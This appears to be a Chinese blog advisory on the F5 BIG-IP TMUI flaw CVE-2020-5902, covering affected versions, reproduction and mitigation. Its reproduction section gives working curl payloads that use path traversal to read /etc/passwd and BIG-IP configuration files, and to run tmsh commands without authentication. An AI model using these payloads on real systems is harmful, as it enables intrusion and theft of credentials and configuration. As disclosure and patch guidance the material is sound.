## 0x01 F5 BIG-IP介绍 F5 BIG-IP Edge Gateway是一个接入解决方案,为远程用户提供了SSL VPN远程接入、安全性、应用加速和高可用性服务它是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台 ## 0x02 漏洞描述 2020年07月03日,发布了F5 BIG-IP远程代码执行的风险通告,该漏洞编号为 CVE-2020-5902,漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。 ## 0x03 风险等级 | **评定方式** | **等级** | | ------------ | -------- | | 威胁等级 | 严重 | | 影响面 | 广泛 | ## 0x04 相关空间测绘数据 360安全大脑-Quake网络空间测绘系统通过对全网资产测绘,发现`BIG-IP`在 `全球` 均有广泛使用,具体分布如下图所示。  ## 0x05 影响版本 - BIG-IP 15.x: 15.1.0/15.0.0 - BIG-IP 14.x: 14.1.0 ~ 14.1.2 - BIG-IP 13.x: 13.1.0 ~ 13.1.3 - BIG-IP 12.x: 12.1.0 ~ 12.1.5 - BIG-IP 11.x: 11.6.1 ~ 11.6.5 ## 0x06 复现 ### 文件读取poc ``` curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ```  ### RCE poc ``` curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' ```  ## 0x07修复建议 升级到以下版本 BIG-IP 15.x: 15.1.0.4 BIG-IP 14.x: 14.1.2.6 BIG-IP 13.x: 13.1.3.4 BIG-IP 12.x: 12.1.5.2 BIG-IP 11.x: 11.6.5.2 ### 临时修复建议 1) 使用以下命令登录对应系统 ``` tmsh ``` 2) 编辑 httpd 组件的配置文件 ``` edit /sys httpd all-properties ``` 3) 文件内容如下 ``` include ' <LocationMatch ".*..;.*"> Redirect 404 / </LocationMatch> ' ``` 4) 按照如下操作保存文件 按下 ESC 并依次输入 :**wq** 5) 执行命令刷新配置文件 ``` save /sys config ``` 6) 重启 httpd 服务 ``` restart sys service httpd ``` 并禁止外部IP对 TMUI 页面的访问 Last modification:July 6th, 2020 at 01:30 pm © 允许规范转载 Support 如果觉得我的文章对你有用,请随意赞赏 ×Close Appreciate the author Sweeping payments Pay by AliPay Pay by WeChat
